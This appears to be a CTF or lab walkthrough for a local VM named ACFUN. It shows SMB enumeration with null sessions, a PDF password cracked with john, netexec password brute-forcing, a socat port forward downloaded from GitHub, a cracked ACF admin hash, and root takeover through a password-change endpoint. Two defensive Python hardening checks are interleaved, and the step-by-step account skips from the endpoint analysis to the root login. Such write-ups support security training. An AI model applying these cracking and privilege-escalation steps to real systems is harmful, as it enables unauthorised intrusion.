Scan

```
┌──(root㉿kali)-[/home/kali1]
└─# nmap -A 192.168.245.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-15 20:43 CST
Nmap scan report for 192.168.245.136
Host is up (0.00017s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 10.0 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.21.9 (workgroup: WORKGROUP)
MAC Address: 00:0C:29:3E:D5:2F (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: ACFUN

Host script results:
|_nbstat: NetBIOS name: ACFUN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
|   date: 2026-06-15T12:43:39
|_  start_date: N/A
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.21.9)
|   Computer name: localhost
|   NetBIOS computer name: ACFUN\x00
|   Domain name:
|   FQDN: localhost
|_  System time: 2026-06-15T20:43:39+08:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.17 ms 192.168.245.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.90 seconds
```

There is an SMB share. Connecting to SMB directly gives you a PDF whose contents are some ACFun-related material. The PDF is encrypted, so here are the steps to get into it. First, use pdf2john to see which encryption scheme it uses and extract the hash:

```
┌──(root㉿kali)-[/home/kali1]
└─# pdf2john ACF_Framework_Internal_Guide.pdf
ACF_Framework_Internal_Guide.pdf:$pdf$2*3*128*2147483644*1*16*eaf858bf9a202826f048f9e8927c33c0*32*b638e2822a306edc2e0d5f04c4fd0ef000000000000000000000000000000000*32*3863fe1ffbc881b421b301c8c0cd614a0c9bb69ed8341f042a3348c507d3a522
```

Then crack the saved hash with john:

```
┌──(root㉿kali)-[/home/kali1]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt pdf_hash.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 3 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234567890       (?)
1g 0:00:00:00 DONE (2026-04-27 21:58) 100.0g/s 6400p/s 6400c/s 6400C/s 123456..charlie
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed.
```

Having read it, the PDF does not contain much, but it lets you guess what this server is for. Since it is an SMB service, enum4linux-ng can be used to enumerate it:

```
┌──(root㉿kali)-[/home/kali1]
└─# enum4linux-ng -A 192.168.245.136
ENUM4LINUX - next generation (v1.3.10)

|    Target Information    |
[*] Target ........... 192.168.245.136
[*] Username ......... ''
[*] Random Username .. 'vnqvwqyx'
[*] Password ......... ''
[*] Timeout .......... 10 second(s)

|    Listener Scan on 192.168.245.136    |
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

|    NetBIOS Names and Workgroup/Domain for 192.168.245.136    |
[+] Got domain/workgroup name: WORKGROUP
[+] Full NetBIOS names information:
- ACFUN           <00> -         B <ACTIVE>  Workstation Service
- ACFUN           <03> -         B <ACTIVE>  Messenger Service
- ACFUN           <20> -         B <ACTIVE>  File Server Service
- WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
- WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
- MAC Address = 00-00-00-00-00-00

|    SMB Dialect Check on 192.168.245.136    |
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: true
  SMB 2.0.2: true
  SMB 2.1: true
  SMB 3.0: true
  SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: false

|    Domain Information via SMB session for 192.168.245.136    |
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: ACFUN
NetBIOS domain name: ''
DNS domain: ''
FQDN: localhost
Derived membership: workgroup member
Derived domain: unknown

|    RPC Session Check on 192.168.245.136    |
[*] Check for anonymous access (null session)
[+] Server allows authentication via username '' and password ''
# This means an empty username or empty password is accepted: the SMB server can be connected to without any credentials at all.
[*] Check for guest access
[+] Server allows authentication via username 'vnqvwqyx' and password ''
[H] Rerunning enumeration with user 'vnqvwqyx' might give more results

|    Domain Information via RPC for 192.168.245.136    |
[+] Domain: WORKGROUP
[+] Domain SID: NULL SID
[+] Membership: workgroup member

|    OS Information via RPC for 192.168.245.136    |
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via srvinfo
[+] Found OS information via srvinfo
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 4.21.9)
OS version: '6.1'
OS release: ''
OS build: '0'
Native OS: Windows 6.1
Native LAN manager: Samba 4.21.9
Platform id: '500'
Server type: '0x809a03'
Server type string: Wk Sv PrQ Unx NT SNT Samba Server

|    Users via RPC on 192.168.245.136    |
[*] Enumerating users via 'querydispinfo'
[+] Found 1 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 1 user(s) via 'enumdomusers'
[+] After merging user results we have 1 user(s) total:
'1000':
  username: leaf          # an ordinary user, leaf
  name: ''
  acb: '0x00000010'       # this flag means the account needs a password to log in
  description: ''

|    Groups via RPC on 192.168.245.136    |
[*] Enumerating local groups
[+] Found 0 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 0 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 0 group(s) via 'enumdomgroups'

|    Shares via RPC on 192.168.245.136    |
[*] Enumerating shares
[+] Found 2 share(s):     # the two shares that were found
IPC$:
  comment: IPC Service (Samba Server)
  type: IPC
public:
  comment: ''
  type: Disk
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share public
[+] Mapping: OK, Listing: OK

|    Policies via RPC for 192.168.245.136    |
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
  Password history length: None
  Minimum password length: 5      # weak password policy
  Minimum password age: none
  Maximum password age: 49710 days (136 years) 6 hours 21 minutes
  Password properties:
  - DOMAIN_PASSWORD_COMPLEX: false
  - DOMAIN_PASSWORD_NO_ANON_CHANGE: false
  - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
  - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
  - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
  - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
  Lockout observation window: 30 minutes
  Lockout duration: 30 minutes
  Lockout threshold: None
Domain logoff information:
  Force logoff time: 49710 days (136 years) 6 hours 21 minutes

|    Printers via RPC for 192.168.245.136    |
[+] No printers returned (this is not an error)
```
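The post reads the enum4linux-ng output by eye. As an added example (my code, not the post's and not the tool's), here is a small Python audit that parses the same kind of transcript, flags each weak setting the scan above shows (null session, empty-password guest mapping, SMB1 still offered, signing optional, a share listable without credentials, a short minimum password length, no complexity rule, no lockout) and names the Samba control that addresses it. The sample text is constructed to mirror the output above, and the smb.conf parameter names and `pdbedit -P` policy names are what I believe apply to a standalone Samba server; the `check password script` path is a placeholder.

```python
import re
from dataclasses import dataclass

# Constructed sample: a trimmed enum4linux-ng transcript with the same
# findings as the scan in the post (not a copy of the tool's full output).
WEAK_OUTPUT = """\
[*] Checking SMB
[+] SMB is accessible on 445/tcp
    SMB 1.0: true
    SMB 2.0.2: true
    SMB 3.1.1: true
    Preferred dialect: SMB 3.0
    SMB1 only: false
    SMB signing required: false
[*] Check for anonymous access (null session)
[+] Server allows authentication via username '' and password ''
[*] Check for guest access
[+] Server allows authentication via username 'vnqvwqyx' and password ''
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share public
[+] Mapping: OK, Listing: OK
    Password history length: None
    Minimum password length: 5
    Password properties:
      - DOMAIN_PASSWORD_COMPLEX: false
    Lockout threshold: None
"""

# Constructed sample of the same keys as a hardened server would report them.
HARDENED_OUTPUT = """\
    SMB 1.0: false
    SMB signing required: true
    Minimum password length: 12
      - DOMAIN_PASSWORD_COMPLEX: true
    Lockout threshold: 5
"""


@dataclass
class Finding:
    severity: str  # "high", "medium" or "low"
    what: str      # the weakness observed in the transcript
    fix: str       # smb.conf setting or pdbedit policy that addresses it


def audit_enum4linux(text: str, min_length: int = 12) -> list[Finding]:
    """Walk the transcript line by line and collect weak settings."""
    findings: list[Finding] = []
    share = None  # share currently under "[*] Testing share ..."
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("- "):          # YAML-style list item ("- DOMAIN_...")
            line = line[2:]
        # Null session: empty username AND empty password accepted.
        if re.search(r"username '' and password ''", line):
            findings.append(Finding("high", "null session accepted (no credentials needed)",
                                    "restrict anonymous = 2"))
        # Guest mapping: a made-up username with an empty password is accepted.
        elif re.search(r"username '\S+' and password ''", line):
            findings.append(Finding("high", "unknown user with empty password mapped to guest",
                                    "map to guest = Never"))
        m = re.search(r"Testing share (\S+)$", line)
        if m:
            share = m.group(1)
            continue
        if share and line.endswith("Listing: OK"):
            findings.append(Finding("medium", f"share '{share}' listable over the unauthenticated session",
                                    f"guest ok = no (in [{share}])"))
        m = re.fullmatch(r"SMB 1\.0: (true|false)", line)
        if m and m.group(1) == "true":
            findings.append(Finding("medium", "SMB1 (NT1) dialect still offered",
                                    "server min protocol = SMB2_02"))
        m = re.fullmatch(r"SMB signing required: (true|false)", line)
        if m and m.group(1) == "false":
            findings.append(Finding("medium", "SMB signing not required", "server signing = mandatory"))
        m = re.fullmatch(r"Minimum password length: (\S+)", line)
        if m:
            value = 0 if m.group(1) == "None" else int(m.group(1))
            if value < min_length:
                findings.append(Finding("medium", f"minimum password length is {m.group(1)} (want >= {min_length})",
                                        f"pdbedit -P 'min password length' -C {min_length}"))
        m = re.fullmatch(r"DOMAIN_PASSWORD_COMPLEX: (true|false)", line)
        if m and m.group(1) == "false":
            findings.append(Finding("low", "no password complexity requirement",
                                    "check password script = /path/to/checker  (placeholder path)"))
        m = re.fullmatch(r"Lockout threshold: (\S+)", line)
        if m and (m.group(1) == "None" or int(m.group(1)) == 0):
            findings.append(Finding("medium", "no account lockout: online password guessing is unthrottled",
                                    "pdbedit -P 'bad lockout attempt' -C 5"))
    return findings


def count_by_severity(findings: list[Finding]) -> dict[str, int]:
    """Summary counts, always with all three keys present."""
    return {s: sum(1 for f in findings if f.severity == s) for s in ("high", "medium", "low")}


if __name__ == "__main__":
    for f in audit_enum4linux(WEAK_OUTPUT):
        print(f"[{f.severity:6}] {f.what}  ->  {f.fix}")
    print(count_by_severity(audit_enum4linux(WEAK_OUTPUT)))
```

Run against the weak sample it reports eight findings (two high); against the hardened sample it reports none, which is the check worth re-running after the smb.conf change.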
What this scan gives us is roughly the SMB password policy plus one username, leaf. With that username we can try a brute-force; here I used netexec:

```
┌──(kali1㉿kali)-[~]
└─$ netexec smb 192.168.245.136 -u leaf -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB         192.168.245.136 445    ACFUN            [*] Unix - Samba (name:ACFUN) (domain:ACFUN) (signing:False) (SMBv1:True) (Null Auth:True)
SMB         192.168.245.136 445    ACFUN            [-] ACFUN\leaf:123456 STATUS_LOGON_FAILURE
SMB         192.168.245.136 445    ACFUN            [-] ACFUN\leaf:12345 STATUS_LOGON_FAILURE
SMB         192.168.245.136 445    ACFUN            [-] ACFUN\leaf:123456789 STATUS_LOGON_FAILURE
SMB         192.168.245.136 445    ACFUN            [-] ACFUN\leaf:password STATUS_LOGON_FAILURE
```

Log in to SMB and upload a public key, then log in to the server. Once on the box you can see there is another user, xueli. Honestly, I only learned from a walkthrough that xueli uses the same private key as leaf. First time I've been tricked like that, haha. I tried sudo -l to look at SUID, but it asks for a password.

Running ps shows an httpd service. Looking at the listening ports and connections, there is a port 443 bound to the local address only. You can try curl or wget to see whether the page is reachable; I think it was something like `wget -qO --no-check-certificate https://`. Port 443 is not reachable from outside, so we need something that maps the local port to one that is reachable externally. I used socat:

```
wget https://github.com/jingjingxyk/build-static-socat/releases/download/v2.5.0/socat-1.8.1.1-linux-x64.tar.xz
tar -xvf *.xz
./socat TCP4-LISTEN:8080,fork,reuseaddr TCP4:127.0.0.1:443
```

This way the internal port 443 can be reached from outside through port 8080.

Log in as xueli with leaf's private key and you can read /etc/acf/passwd on the server. This file holds the password for the ACF admin console, but it is not the local root password: the ACF architecture keeps web users separate from local system users. You can read more about this in the openEuler community article 详解ACF: Alpine Linux轻量Web配置框架 (by linux_vortex5).

```
xueli@Acfun:~$ cat /etc/acf/passwd
root:$5$rDkGkMAvv6FPpwRG$.gS5I9LcOiZDYGW598cgXDPEDvHI7GLl.UmVxgdyUQ0:Admin account:ADMIN
```

This is where ACF stores its user accounts. The password is hashed with SHA-256 (the `$5$` sha256crypt format), so we can crack it with john, a tool focused on cracking system passwords:

```
┌──(kali1㉿kali)-[~]
└─$ sudo john --format=sha256crypt --wordlist=/usr/share/wordlists/rockyou.txt 1
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 512/512 AVX512BW 16x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
juggernaut       (root)
1g 0:00:00:05 DONE (2026-06-24 11:15) 0.1930g/s 12651p/s 12651c/s 12651C/s sactown..ryanscott
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

After logging in, hmm, the rest is really code auditing and understanding how the web backend is structured. I'm honestly not good at code auditing, so I handed it straight to an AI. Roughly: you have to find the deliberately planted vulnerability in the backend code, then reach the endpoint that exposes it in order to escalate privileges.

```
xueli@Acfun:/usr/share/acf/app$ ls -al
total 100
drwxr-xr-x    5 root     root          4096 Apr 26 13:56 .
drwxr-xr-x    5 root     root          4096 Apr 26 13:56 ..
drwxr-xr-x    2 root     root          4096 Apr 26 13:56 acf-util
-rw-r--r--    1 root     root          1811 Nov 25  2024 acf_cli-controller.lua
-rw-r--r--    1 root     root         26283 Nov 25  2024 acf_www-controller.lua
drwxr-xr-x    2 root     root          4096 Apr 26 13:56 alpine-baselayout
drwxr-xr-x    2 root     root          4096 Apr 26 13:56 apk-tools
-rw-r--r--    1 root     root           905 Nov 25  2024 debug-html.lsp
-rw-r--r--    1 root     root          1215 Nov 25  2024 dispatcherror-html.lsp
-rw-r--r--    1 root     root          1150 Nov 25  2024 exception-html.lsp
-rw-r--r--    1 root     root           422 Nov 25  2024 expert-html.lsp
-rw-r--r--    1 root     root          1894 Nov 25  2024 filedetails-html.lsp
-rw-r--r--    1 root     root          1015 Nov 25  2024 logfile-html.lsp
-rw-r--r--    1 root     root           446 Nov 25  2024 menuhints.menu
-rw-r--r--    1 root     root          1777 Nov 25  2024 status-html.lsp
-rw-r--r--    1 root     root          4815 Nov 25  2024 template-html.lsp
-rw-r--r--    1 root     root           241 Nov 25  2024 template-json.lsp
-rw-r--r--    1 root     root           772 Nov 25  2024 template-stream.lsp
xueli@Acfun:/usr/share/acf/app$ pwd
/usr/share/acf/app
```

Why do I say "deliberately"? Mainly because the vulnerability feels sloppy: normally this code would not be there, since ACF is supposed to be isolated from system accounts, yet I can change the root password straight from the ACF admin console, which doesn't quite add up. That is only my guess; I don't know whether the vulnerability is actually there upstream.

The alpine-baselayout directory here contains the backend code for everything you can do after logging in; password-model.lua and password-controller.lua are the parts that handle passwords.

```
xueli@Acfun:/usr/share/acf/app/alpine-baselayout$ ls -al | grep pas
-rw-r--r--    1 root     root           284 Jun 28  2023 password-controller.lua
-rw-r--r--    1 root     root          1562 Jun 28  2023 password-model.lua
```

The first file mostly handles the data the client submits. The second is the important one: in short, it checks whether the user being modified exists on the system, and if so whether the new password's length is acceptable; if both pass, it re-hashes the new password and replaces that user's password in the system's /etc/shadow. From these two files we can be sure that ACF really can change the passwords of system users directly. What we don't know is where the endpoint for changing a system user's password is: we know how the Lua backend is written, but not how its interface is called. I asked the AI to find the path and got https://192.168.245.136:1234/cgi-bin/acf/alpine-baselayout/password/edit. The AI explained it in roughly three steps. Step 1: work out the "rules" of the core router. In acf_www-controller.lua:

```lua
self.conf.prefix, self.conf.controller, self.conf.action = self.parse_path_info(ENV["PATH_INFO"])
```

So the URL skeleton is /<base CGI entry>/<prefix>/<controller>/<action>.

```
┌──(kali1㉿kali)-[~]
└─$ ssh root@192.168.245.136
root@192.168.245.136's password:
root@Acfun:~# ls -al
total 20
drwx------    3 root     root          4096 Apr 26 14:18 .
drwxr-xr-x   21 root     root          4096 Apr 26 16:10 ..
lrwxrwxrwx    1 root     root             9 Feb 25 17:00 .bash_history -> /dev/null
drwx------    2 root     root          4096 Apr 26 01:12 .ssh
-rw-r--r--    1 root     root            11 Apr 26 14:18 acf.pass
-rw-r--r--    1 root     root            44 Apr 26 15:54 root.txt
```
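The post's reading of password-model.lua is that the model only checks that the target account exists and that the new password is long enough before it rewrites /etc/shadow. As an added example (my code, not ACF's and not taken from the box), here is the validation a web console should perform before it is allowed to touch a system account, in Python: it parses a constructed /etc/passwd excerpt and refuses root, any system account (uid below 1000), accounts without a login shell, and anything outside an explicit allowlist of web-managed accounts, on top of the existence and length checks the post describes. The passwd lines, the allowlist and the minimum length are assumptions for the demonstration.

```python
from dataclasses import dataclass

# Constructed /etc/passwd excerpt for the demonstration (not copied from the box).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
leaf:x:1000:1000:Linux User,,,:/home/leaf:/bin/ash
xueli:x:1001:1001:Linux User,,,:/home/xueli:/bin/ash
"""

# Assumed allowlist: the only accounts the web console is permitted to manage.
MANAGED_ACCOUNTS = frozenset({"leaf", "xueli"})
MIN_PASSWORD_LENGTH = 12  # assumed policy; the model on the box only checks "long enough"


@dataclass(frozen=True)
class Account:
    name: str
    uid: int
    shell: str


def parse_passwd(text: str) -> dict[str, Account]:
    """Minimal /etc/passwd parser keeping name, uid and login shell per entry."""
    accounts: dict[str, Account] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip malformed entries rather than guess at them
        name, _pw, uid, _gid, _gecos, _home, shell = fields
        accounts[name] = Account(name, int(uid), shell)
    return accounts


def validate_password_change(user: str, new_password: str, accounts: dict[str, Account],
                             managed: frozenset[str] = MANAGED_ACCOUNTS,
                             min_length: int = MIN_PASSWORD_LENGTH) -> list[str]:
    """Return every reason the change must be refused; an empty list means allowed.

    The first two checks are the ones the post found in the model; the rest
    enforce the web/system separation the post says ACF is supposed to keep.
    """
    account = accounts.get(user)
    if account is None:
        return ["no such account"]
    reasons: list[str] = []
    if len(new_password) < min_length:
        reasons.append(f"password shorter than {min_length} characters")
    if account.uid == 0:
        reasons.append("refusing to change the password of uid 0 (root)")
    elif account.uid < 1000:
        reasons.append("refusing to change the password of a system account (uid < 1000)")
    if account.shell.endswith("nologin"):
        reasons.append("account has no login shell; nothing to manage")
    if user not in managed:
        reasons.append("account is not in the web-managed allowlist")
    return reasons


def change_allowed(user: str, new_password: str, accounts: dict[str, Account]) -> bool:
    """Convenience wrapper for the controller: True only when no reason to refuse."""
    return not validate_password_change(user, new_password, accounts)


if __name__ == "__main__":
    accounts = parse_passwd(SAMPLE_PASSWD)
    for user, pw in [("root", "short-pass1"), ("leaf", "correct horse battery staple"), ("ghost", "x")]:
        reasons = validate_password_change(user, pw, accounts)
        print(user, "->", "allowed" if not reasons else "; ".join(reasons))
```

The point of returning a list rather than a boolean is that the controller can log every failed rule for the request, which is also the signal to alert on: a web console asking to rewrite the root entry is exactly the action the post abuses.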